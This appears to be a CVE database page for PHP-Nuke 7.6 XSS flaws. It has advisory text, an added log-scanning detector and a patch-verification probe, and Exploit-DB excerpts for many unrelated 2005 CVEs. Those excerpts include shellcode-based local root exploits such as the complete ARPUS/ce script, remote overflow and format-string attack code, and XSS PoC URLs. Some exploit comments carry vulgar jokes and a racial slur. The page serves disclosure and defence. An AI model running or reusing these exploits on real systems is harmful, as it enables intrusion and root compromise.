CVE-2005-1000
Published 2005-05-02
Priority P4 · 18 affected ranges · medium · CVSS 2.0 base score 4.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
Public exploit: yes (Exploit-DB entries below)
EPSS: 1.76% (75.3th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 7.6 allow remote attackers to inject arbitrary web script or HTML via (1) the bid parameter to the EmailStats op in banners.php (misspelled "banners.pgp" in the original CVE text), (2) the ratenum parameter in the TopRated and MostPopular actions in the Web_Links module, (3) the ttitle parameter in the viewlinkdetails, viewlinkeditorial, viewlinkcomments, and ratelink actions in the Web_Links module, or (4) the username parameter in the Your_Account module. All four are reflected XSS through GET parameters; the payload travels in the URL and is echoed into the page without output encoding.
Affected
18 ranges, all for vendor francisco_burzi, product php-nuke; the source records no version bounds and no fixed-in version for any of them.
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| francisco_burzi | php-nuke | — (18 ranges listed without bounds) | — |
GHSA
GHSA-mrv4-qgw7-rp76: Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 7 · CVE-2005-1000 · MEDIUM · ghsa_unreviewed · 2022-05-01
Description identical to the CVE text above.
GHSA
GHSA-355j-f2rj-3mv5: Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6 · CVE-2005-1023 · MEDIUM · CVSS 4.3 · ghsa_unreviewed · 2022-05-01
Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6.x to 7.6 allow remote attackers to inject arbitrary web script or HTML via the (1) min parameter to the Search module, (2) the categories parameter to the FAQ module, or (3) the ltr parameter to the Encyclopedia module. NOTE: the bid parameter issue in banners.php is already an item in CVE-2005-1000.
No detection rules found.
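Since the page carries no detection rule, here is one a SOC could run over web-server access logs, added as an example for this page (it is not PHP-Nuke code and not from any vendor or Exploit-DB author). It parses Apache combined-format lines, percent-decodes the query a second time to catch double-encoded probes, and reports requests that reach one of the four CVE-2005-1000 code paths with markup in the tainted parameter. The log lines are constructed; the /nuke/ path prefix and the op=userinfo and lid= parameters are assumptions, not taken from the advisory.

```python
"""Flag CVE-2005-1000 XSS probes in Apache combined-format access logs.

Added example for this page; not PHP-Nuke code. The four vectors are the ones
named in the CVE text; the sample log lines below are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# (script, query values that select the vulnerable code path, tainted parameter)
VECTORS = [
    ("banners.php", {"op": {"emailstats"}}, "bid"),
    ("modules.php", {"name": {"web_links"}, "l_op": {"toprated", "mostpopular"}}, "ratenum"),
    ("modules.php", {"name": {"web_links"},
                     "l_op": {"viewlinkdetails", "viewlinkeditorial", "viewlinkcomments", "ratelink"}}, "ttitle"),
    ("modules.php", {"name": {"your_account"}}, "username"),
]

# Characters or tokens that break out of a text node or attribute once echoed raw.
MARKUP = re.compile(r'[<>"\']|javascript:|\bon[a-z]+\s*=', re.IGNORECASE)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode(value, rounds=2):
    """Percent-decode repeatedly so %253C -> %3C -> < (double-encoded probes)."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value


def classify(target):
    """Return (param, decoded_value) when the request hits a CVE-2005-1000 path
    with markup in the tainted parameter, else None."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    qs = parse_qs(parts.query, keep_blank_values=True)  # decodes once
    for vec_script, selectors, param in VECTORS:
        if script != vec_script or param not in qs:
            continue
        on_path = all(any(v.lower() in allowed for v in qs.get(key, []))
                      for key, allowed in selectors.items())
        if not on_path:
            continue
        for raw in qs[param]:
            value = decode(raw)
            if MARKUP.search(value):
                return param, value
    return None


def scan(lines):
    """Return [(client_ip, param, decoded_payload)] for every probe in the log lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        found = classify(m.group("target"))
        if found:
            hits.append((m.group("ip"), found[0], found[1]))
    return hits


SAMPLE_LOG = [  # constructed lines, not real traffic
    '203.0.113.5 - - [06/Apr/2005:10:00:01 +0000] "GET /nuke/banners.php?op=EmailStats&name=sex&bid=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512 "-" "Mozilla"',
    '203.0.113.5 - - [06/Apr/2005:10:00:02 +0000] "GET /nuke/modules.php?name=Web_Links&l_op=MostPopular&ratenum=%3Ch1%3E50&ratetype=num HTTP/1.1" 200 2048 "-" "Mozilla"',
    '198.51.100.7 - - [06/Apr/2005:10:00:03 +0000] "GET /nuke/modules.php?name=Web_Links&l_op=viewlinkdetails&lid=3&ttitle=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 1024 "-" "curl"',
    '198.51.100.7 - - [06/Apr/2005:10:00:04 +0000] "GET /nuke/modules.php?name=Your_Account&op=userinfo&username=%22%3E%3Cscript%3E HTTP/1.1" 200 900 "-" "curl"',
    '192.0.2.9 - - [06/Apr/2005:10:00:05 +0000] "GET /nuke/modules.php?name=Web_Links&l_op=MostPopular&ratenum=10&ratetype=num HTTP/1.1" 200 2048 "-" "Mozilla"',
    '192.0.2.9 - - [06/Apr/2005:10:00:06 +0000] "GET /nuke/modules.php?name=Your_Account&op=userinfo&username=alice HTTP/1.1" 200 900 "-" "Mozilla"',
]

if __name__ == "__main__":
    for ip, param, payload in scan(SAMPLE_LOG):
        print(f"{ip} probed {param}: {payload!r}")
```

Because every vector here is a GET parameter, the payload is present in the request line and ordinary access logs are enough; the same rule would miss POST bodies. The second decoding round matters: the third sample line is double-encoded and would pass a single-decode rule untouched.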
Exploit-DB
Linux chfn (SuSE 9.3/10) - Local Privilege Escalation · CVE-2005-3503 · exploitdb · 2005-11-08
---
#!/bin/sh
#
# Exploit for SuSE Linux 9.{1,2,3}/10.0, Desktop 1.0, UnitedLinux 1.0
# and SuSE Linux Enterprise Server {8,9} 'chfn' local root bug.
#
# by Hunger
#
# Advistory:
# http://lists.suse.com/archive/suse-security-announce/2005-Nov/0002.html
#
# hunger@suse:~> id
# uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
# hunger@suse:~> ./susechfn.sh
# Type your current password to get root... :)
# Password:
# sh-2.05b# id
# uid=0(r00t) gid=0(root) groups=0(root)
if [ X"$SHELL" = "X" ]; then
echo "No SHELL environment, using /bin/sh for default."
export SHELL=/bin/sh
fi
if [ -u /usr/bin/chfn ]; then
/bin/echo "Type your current password to get root... :)"
/usr/bin/chfn -h "`echo -e ':/:'$SHELL'\nr00t::0:0:'`" $USER > /dev/n
Exploit-DB
gpsdrive 2.09 (x86) - 'friendsd2' Remote Format String · CVE-2005-3523 · exploitdb · 2005-11-04
---
#!/usr/bin/perl -w
#
# Code by KF, although it is most likely ripped from John H.
# (kf_lists[at]digital_munition[dot]com)
#
# http://www.digitalmunition.com
#
# FrSIRT 24/24 & 7/7 - Centre de Recherche on Donkey Testicles.
# Free 14 day Testicle licking trial available!
#
# friendsd.c:367: fprintf (stderr, txt);
#
# Tested on intel using gpsdrive_2.09-2_i386.deb
#
# kfinisterre@animosity:~$ telnet localhost 5074
# Trying 127.0.0.1...
# Connected to animosity
# Escape character is '^]'.
# id;
# uid=1000(kfinisterre) gid=1000(kfinisterre) groups=1000(kfinisterre)
# : command not found
#
# [email protected]
# x86 portbind a shell in port 5074
# 92 bytes.
#
# This shit is NOT robust and most likely will NOT work on kernel 2.
Exploit-DB
Asus VideoSecurity Online 3.5 - Web Server Authentication Buffer Overflow · CVE-2005-3489 · exploitdb · 2005-11-02
---
/*
source: https://www.securityfocus.com/bid/15279/info
Asus VideoSecurity Online is prone to a buffer overflow in the authentication mechanism of the included Web server. This issue only exists if authentication is enabled on the Web server.
The Web server included with Asus VideoSecurity Online is not enabled by default.
This vulnerability is reported to affect Asus VideoSecurity Online 3.5.0 and earlier.
*/
/* by Luigi Auriemma */
#include
#include
#include
#ifdef WIN32
#include
#include "winerr.h"
#define close closesocket
#define ONESEC 1000
#else
#include
#include
#include
#include
#include
#include
#define ONESEC 1
#endif
#define VER "0.1"
#define PORT 80
#define BUFFSZ 8192
#define BOFSZ 2700
u_char
Exploit-DB
GNU Mailutils imap4d 0.6 - 'Search' Remote Format String · CVE-2005-2878 · exploitdb · 2005-09-10
---
/*
* GNU Mailutils 0.6 imap4d 'search' format string exploit.
* Ref: www.idefense.com/application/poi/display?id=303&type=vulnerabilities
*
* This silly exploit uses hardcoded values taken from GNU/Debian testing (etch).
*
* $ ./imap4d_search_expl -h 127.0.0.1 -p 143 -u clem1 -s PROUT
* [+] GNU Mailutils 0.6 imap4d 'search' format string exploit.
* [+] By clem1.
* [+] connecting to: 127.0.0.1:143
* [+] authentification: completed.
* [+] format string: sended
* [+] shellcode sended.
* [+] Bingo.
*
* id;
* uid=1000(clem1) gid=1002(mail) groups=0(root)
*
* Copyright (C) 2005 Clement Lecigne - clem1 @ badcode.info.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struc
Exploit-DB
Indiatimes Messenger 6.0 - Remote Buffer Overflow · CVE-2005-2844 · exploitdb · 2005-08-31
---
source: https://www.securityfocus.com/bid/14705/info
Indiatimes Messenger is reported prone to a remote buffer overflow vulnerability.
A successful attack may trigger a crash in the client or lead to arbitrary code execution. The attacker may then gain unauthorized remote access in the context of the user running the application.
Indiatimes Messenger 6.0 is affected by this issue.
[script]
var obj1 = new
ActiveXObject("MMClient.MunduMessenger.1");
var buf = "";
for(i=0; i<1000; i++)
{
buf += "A";
}
while(obj1.GetServerStatus() != "Logged In"); // wait till login
obj1.RenameGroup("Friends", buf, 5);
[/script]
Exploit-DB
Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution · CVE-2005-2262 · exploitdb · 2005-07-13
---
// Exploit by Michael Krax
Firewalling - Proof-of-Concept
function stopload() {
// in some cases the javascript url never stops to load
// therefore we force a stop after the real image got loaded
window.setTimeout("window.stop()",1000);
}
Firewalling - Proof-of-Concept
The "Set As Wallpaper" dialog takes the image url as a parameter without validating it.
This allows to execute javascript in chrome and to run arbitrary code.
By using absolute positioning and the moz-opacity filter an attacker can easily fool the
user to think he is setting a valid image as wallpaper.
Right click on the image and choose "Set As Wallpaper". The demo requests
UniversalXPConnect rights, creates c:\booom.bat and launches the batch file
tha
Exploit-DB
Apple Mac OSX 10.4 - launchd Race Condition · CVE-2005-1725 · exploitdb · 2005-06-14
---
/*
* Mac OS X 10.4 launchd race condition exploit
*
* intropy (intropy caughq.org)
*/
/* .sh script to help with the offsets /str0ke
#!/bin/bash
X=1000
Y=3000
I=1
while ((1))
do
./CAU-launchd /etc/passwd $X
if [ $I -lt 30 ]
then
((X=$X+$Y))
((I=$I+1))
else
X=1000
I=1
fi
done
*/
#include
#include
#include
#include
#include
#include
#define DEBUG 0
#define SLEEP 6000
main(int argc, char *argv[])
{
pid_t pid;
int count, sleep = SLEEP;
char name[100];
char target[100];
struct stat *stats = (struct stat *)malloc(sizeof(struct stat));
if ( argc < 2 ) {
/* usage line reconstructed: the angle-bracketed argument names were lost in extraction */
printf("Usage: %s <target> [sleep]\n", argv[0]);
exit(-1);
} else if ( argc > 2 ) {
sleep = atoi(argv[2]);
strncpy(target, argv[1], sizeof(target)-1);
} else {
strncpy(target, argv[1], sizeof(target)-1);
}
if ( DEBUG ) printf("Goin
Exploit-DB
ARPUS/Ce - Local Overflow (setuid) · CVE-2005-1396 · exploitdb · 2005-05-01
---
#!/usr/bin/perl -w
#
# Setuid ARPUS/ce exploit by KF - kf_lists[at]digitalmunition[dot]com - 4/21/05
#
# Copyright Kevin Finisterre
# kfinisterre@threat:/tmp$ ./ce_ex.pl
# sh-2.05b# id
# uid=0(root) gid=1000(kfinisterre)
# groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),1000(kfinisterre)
#
# 57 bytes long
$sc = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";
$buf = "\x90" x (4120-569);
$buf .= $sc;
$buf .= (pack("l",(0xbfffa187)) x2);
$ENV{"XAPPLRESLANGPATH"} = $buf;
exec("/usr/bin/ce");
# milw0rm.com [2005-05-01]
Exploit-DB
Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit) · CVE-2005-1099 · exploitdb · 2005-04-12
---
'Name' => 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in the Salim Gasmi
GLD
},
'Version' => '$Revision$',
'Author' => [ 'patrick' ],
'Arch' => ARCH_X86,
'Platform' => 'linux',
'References' =>
[
[ 'CVE', '2005-1099' ],
[ 'OSVDB', '15492' ],
[ 'BID', '13129' ],
[ 'URL', 'http://www.milw0rm.com/exploits/934' ],
],
'Privileged' => true,
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20=",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(2525)
],
self.class
)
end
def exploit
connect
sploit = "sender="+ payload.encoded + "\r\n"
sploit << "client_address=" + [
Exploit-DB
PHP-Nuke 7.6 - 'banners.php' Cross-Site Scripting · CVE-2005-1000 · exploitdb · 2005-04-06
---
source: https://www.securityfocus.com/bid/13026/info
PHP-Nuke is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/[php-nuke]/banners.php?op=EmailStats&name=sex&bid=[XSS]
Exploit-DB
PHP-Nuke 7.6 Web_Links Module - Multiple Cross-Site Scripting Vulnerabilities · CVE-2005-1000 · exploitdb · 2005-04-06
---
source: https://www.securityfocus.com/bid/13025/info
PHP-Nuke is reportedly affected by multiple cross-site scripting vulnerabilities in the Web_Links Module. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=TopRated&ratenum=[XSS]&ratetype=num
http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=%3Ch1%3E50&ratetype=num
http://www.example.com/[php-nuk
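The PoC URLs above only show where the payload goes; confirming that a patch actually closed the hole needs a probe whose reflection can be classified. The following is an added example for this page (not PHP-Nuke's code and not from the Exploit-DB authors): it builds one probe URL per tainted parameter named in the CVE using a canary that carries a double quote and angle brackets, and classifies a response body as echoing the canary raw (still vulnerable), entity-escaped (fix in place) or not at all. The two render_* functions are constructed stand-ins for an unpatched and a patched page so the oracle can be exercised offline; the name=x, lid=1 and op=userinfo parameters are assumptions.

```python
"""Probe builder and reflection oracle for the CVE-2005-1000 vectors.

Added example for this page; not PHP-Nuke code. render_vulnerable and
render_fixed are constructed stand-ins, not the real module output.
"""
import html
from urllib.parse import urlencode

# A double quote plus angle brackets breaks out of both attribute and text
# contexts if echoed raw, and the token is unlikely to appear on a page by chance.
CANARY = 'zq"><b>x7</b>'


def build_probes(base, canary=CANARY):
    """One probe URL per tainted parameter. Assumed extras: name=x, lid=1, op=userinfo."""
    return {
        "bid": base + "/banners.php?" + urlencode(
            {"op": "EmailStats", "name": "x", "bid": canary}),
        "ratenum": base + "/modules.php?" + urlencode(
            {"name": "Web_Links", "l_op": "TopRated", "ratenum": canary, "ratetype": "num"}),
        "ttitle": base + "/modules.php?" + urlencode(
            {"name": "Web_Links", "l_op": "viewlinkdetails", "lid": "1", "ttitle": canary}),
        "username": base + "/modules.php?" + urlencode(
            {"name": "Your_Account", "op": "userinfo", "username": canary}),
    }


def reflection(body, canary=CANARY):
    """'raw' if the canary appears verbatim (markup survives, still vulnerable),
    'escaped' if only an entity-encoded form appears, else 'absent'."""
    if canary in body:
        return "raw"
    if html.escape(canary, quote=True) in body or html.escape(canary, quote=False) in body:
        return "escaped"
    return "absent"


def render_vulnerable(ttitle):
    """Constructed stand-in for the unpatched behaviour: raw concatenation into HTML."""
    return "<title>" + ttitle + "</title>\n<b>" + ttitle + "</b>"


def render_fixed(ttitle):
    """Constructed stand-in for the fix: escape on output. PHP's
    htmlspecialchars($ttitle, ENT_QUOTES) yields the same entities."""
    safe = html.escape(ttitle, quote=True)
    return "<title>" + safe + "</title>\n<b>" + safe + "</b>"


def check_all(fetch, base):
    """Run every probe through fetch(url) -> body and return {param: verdict}.
    fetch is supplied by the caller (for example urllib.request.urlopen(url).read().decode())."""
    return {param: reflection(fetch(url)) for param, url in build_probes(base).items()}


if __name__ == "__main__":
    print(reflection(render_vulnerable(CANARY)))  # raw
    print(reflection(render_fixed(CANARY)))       # escaped
```

A verdict of 'escaped' only shows that this one output path encodes; the ttitle parameter is echoed in several actions (viewlinkdetails, viewlinkeditorial, viewlinkcomments, ratelink), so each l_op value should be probed separately before the fix is signed off.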
Exploit-DB
PHP-Nuke 6.x/7.x Your_Account Module - 'Username' Cross-Site Scripting · CVE-2005-1000 · exploitdb · 2005-04-05
---
source: https://www.securityfocus.com/bid/13007/info
It is reported that the PHP-Nuke 'Your_Account' module is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
This problem presents itself when malicious HTML and script code is sent to the application through the 'username' parameter of the 'Your_Account' module.
This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for t
Exploit-DB
PHP-Nuke 6.x/7.x Your_Account Module - Avatarcategory Cross-Site Scripting · CVE-2005-1000 · exploitdb · 2005-04-05
---
source: https://www.securityfocus.com/bid/13010/info
It is reported that the PHP-Nuke 'Your_Account' module is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
This problem presents itself when malicious HTML and script code is sent to the application through the 'Avatarcategory' parameter of the 'Your_Account' module.
This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may a
Exploit-DB
Aeon 0.2a - Local Linux (2) · CVE-2005-1019 · exploitdb · 2005-04-05
---
/* first release /str0ke */
/*
local linux exploit within aeon-0.2a
Coded by patr0n (security-tmp.h14.ru)
*/
#define BUFLEN 533
#define PATH "/home/research/aeon-0.2a/aeon"
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";
int main(int argc, char *argv[]) {
char evilbuf[BUFLEN];
int i;
char *p,*av[2], *ev[3];
char *egg;
egg=(char *)malloc(1000);
sprintf(egg, "EGG=");
memset(egg + 4, 0x90, 1000-1-strlen(shellcode));
sprintf(egg + 4 + 1000-1-strlen(shellcode), "%s", shellcode);
long ret=0xbfffffff-5-strlen(egg)-strlen(PATH);
p=evilbuf;
bzero(evilbuf,sizeof(evilbuf));
strcpy(evilbuf,"HOME=");
for(i=
Exploit-DB
ELOG 2.5.6 - Remote Shell · CVE-2005-0439 · exploitdb · 2005-02-09
---
/* Worked on latest version for me
* http://midas.psi.ch/elog/download/tar/elog-latest.tar.gz
* elog-latest.tar.gz 26-Jan-2005 21:36 519K
* Default port 8080.
* str0ke */
/*
Hi there, someone has brought to u a gift.
ELOG Remote Shell Exploit
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define _GNU_SOURCE
#define CONTSIZE 10000
#define BOUNSIZE 100
#define REQUESTSIZE 2000
#define INBUF 5000
#define LINEBUFSIZ 1000
#define GETBUFSIZE 10000
#define SENDBUFSIZE 10000
#define TIMEOUT 30
#define ENURLSIZE 200
#define GLOBATTSIZE 200
#define STORESIZE 10000
#define ELOGPORT 8080
#define SHBUFSIZE 288
#define BIGBUFSIZE 5000
#define BACKDOOR 31337
#define BSDBAC
Exploit-DB
Setuid perl - 'PerlIO_Debug()' Local Overflow · CVE-2005-0156 · exploitdb · 2005-02-07
---
/*
* Copyright Kevin Finisterre
*
* Setuid perl PerlIO_Debug() overflow
*
* Tested on Debian 3.1 perl-suid 5.8.4-5
*
* (11:07:20) *corezion:* who is tha man with tha masta plan?
* (11:07:36) *corezion:* a nigga with a buffer overrun
* (11:07:39) *corezion:* heh
* (of course that is to the tune of http://www.azlyrics.com/lyrics/drdre/niggawittagun.html)
*
* cc -o ex_perl2 ex_perl2.c -std=c99
*
* kfinisterre@jdam:~$ ./ex_perl2
* Dirlen: 1052
* Charlie Murphy!!!@#@
* sh-2.05b# id
* uid=1000(kfinisterre) gid=1000(kfinisterre) euid=0(root)
*
*/
#include
#include
#include
#include
#include
#include
#include
int main(int *argc, char **argv)
{
int len = 23;
int count = 5;
char malpath[10000];
char tmp[256];
char *filler;
char *ptr;
unsigned ch
References
http://archives.neohapsis.com/archives/bugtraq/2005-04/0037.html
http://marc.info/?l=bugtraq&m=111263454308478&w=2
https://exchange.xforce.ibmcloud.com/vulnerabilities/19952